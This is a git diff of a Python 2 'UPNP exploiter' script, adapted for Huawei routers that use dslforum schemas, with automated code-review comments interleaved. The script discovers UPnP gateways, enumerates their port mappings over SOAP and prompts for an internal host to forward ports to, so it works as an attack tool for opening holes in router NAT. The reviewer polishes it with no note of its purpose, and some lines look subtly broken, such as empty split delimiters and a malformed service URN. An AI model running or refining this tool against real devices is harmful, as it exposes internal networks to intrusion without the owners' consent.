diff --git a/upnp.py b/upnp.py
index d1e16f6..49d37f1 100644
--- a/upnp.py
+++ b/upnp.py
@@ -1,3 +1,4 @@
+"""Adapted the code to make a Huawei version that uses dslforum schemas"""
#!/bin/python
import urllib2, re, sys, select, socket
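Review bot: The added module docstring sits above `#!/bin/python`, so the shebang is no longer the first line of the file and is ignored when the script is executed directly. Put the shebang first and the docstring immediately after it. The text also reads like a commit message; a docstring such as `"""UPnP script variant for devices that publish dslforum-org schemas."""` would describe the module rather than its history.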
@@ -7,6 +8,12 @@
tport = 49170;
upnport = 1900;
msg = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: ssdp:all\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\n\r\n";
+welcome_msg = """##########################
+# UPNP exploiter #
+# By: Anarchy Angel #
+# www.dc414.org #
+# Happy hacking :) #
+##########################""";
###
# Used to ping one target.
@@ -35,7 +42,7 @@ def target():
while True:
string, addr = s.recvfrom(1024);
data.append([addr[0], string]);
- print "Got some data";
+ print "Got some data from %s" % addr[0];
except KeyboardInterrupt:
s.close();
proc(data);
@@ -59,7 +66,7 @@ def lan():
string, addr = res[0][0].recvfrom(1024);
#data += string;
data.append([addr[0], string]);
- print "Got some data";
+ print "Got some data from %s" % addr[0];
except KeyboardInterrupt:
s.close();
proc(data);
@@ -76,10 +83,11 @@ def sploit(host):
print "Trying to get some info from the target...";
try:
res = urllib2.urlopen(host).read();
+ print "Connected"
res = res.replace("\r", "");
res = res.replace("\n", "");
res = res.replace("\t", "");
- pres = res.split("urn:upnp-org:serviceId:WANIPConn1");
+ pres = res.split("urn:dslforum-org:serviceId:WANIPConn1");
p2res = pres[1].split("");
p3res = p2res[0].split("");
ctrl = p3res[1];
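Review bot: `print "Connected"` runs only after `urllib2.urlopen(host).read()` has returned, so it reports that the whole description was downloaded rather than that a connection was opened; `print "Fetched device description";` would match what happened. The `urlopen` call on that line passes no `timeout`, while the call in `proc()` in this same commit uses `timeout=5`. Unless a default socket timeout is set elsewhere, a peer that accepts the connection and then stalls will block this path indefinitely. sploit() starts and ends outside this hunk.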
@@ -93,8 +101,9 @@ def sploit(host):
try:
while True:
opmsg = ''+str(i)+'';
+ ctrl = p3res[1];
open_ports = urllib2.Request("http://"+rhost[1]+""+ctrl, opmsg);
- open_ports.add_header("SOAPACTION", '"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry"');
+ open_ports.add_header("SOAPACTION", '"urn:dslforum-org :service:WANIPConnection:1#GetGenericPortMappingEntry"');
open_ports.add_header('Content-type', 'application/xml');
open_res = urllib2.urlopen(open_ports).read();
int1 = open_res.split('');
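Review bot: The added `ctrl = p3res[1];` is inside the `while True:` loop, so the same value is reassigned on every iteration although `ctrl` is already set from `p3res[1]` earlier in sploit() (visible in the previous hunk). If code between the two hunks overwrites `ctrl`, a comment on this line should say so, for example `# ctrl was overwritten above; restore the control path`. Otherwise the assignment belongs once before the loop. The loop body continues outside this hunk.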
@@ -112,9 +121,9 @@ def sploit(host):
print intport+":"+extport+":"+address+":"+desc
i=i+1;
except Exception, e:
- err=""
+ print e
except Exception, e:
- #print e;
+ print e;
print "Failed to get anything from the target :/"
IP = raw_input("IP of internal host to forward posts to: [192.168.1.100] ");
if IP == "":
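Review bot: The inner `except Exception, e:` now does `print e`, but the `while True:` loop it guards appears to have no other exit, so the exception that ends a normal enumeration will be printed as if something had gone wrong. Which exception type ends the loop is not visible in this hunk; catching that type on its own and printing only unexpected errors would keep the output meaningful. The new `print e` also omits the trailing `;` that the outer handler's `print e;` and the rest of the file use.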
@@ -207,8 +216,8 @@ def proc(data):
url = "http://"+host+":";
port = re.findall("http:\/\/[0-9\.]+:(\d.+)", hdata);
url += port[0];
- p = urllib2.urlopen(url, timeout=3);
- rd = re.findall("schemas-upnp-org:device:([^:]+)", p.read());
+ p = urllib2.urlopen(url, timeout=5);
+ rd = re.findall("dslforum-org:device:([^:]+)", p.read());
if rd[0] == "InternetGatewayDevice":
addr = re.findall("http://([^:]+)", url);
vuln = "Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1";
@@ -236,12 +245,7 @@ def done(data):
# Welcome msg
###
print "";
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
exit(1);
for info in data:
# if sys.argv[1] == "target":
@@ -257,12 +261,7 @@ def done(data):
###
# Welcome msg
###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
exit(1);
###
@@ -272,12 +271,7 @@ def usage():
###
# Welcome msg
###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
print "";
print "upnp.py type ip";
print "Types: lan/target";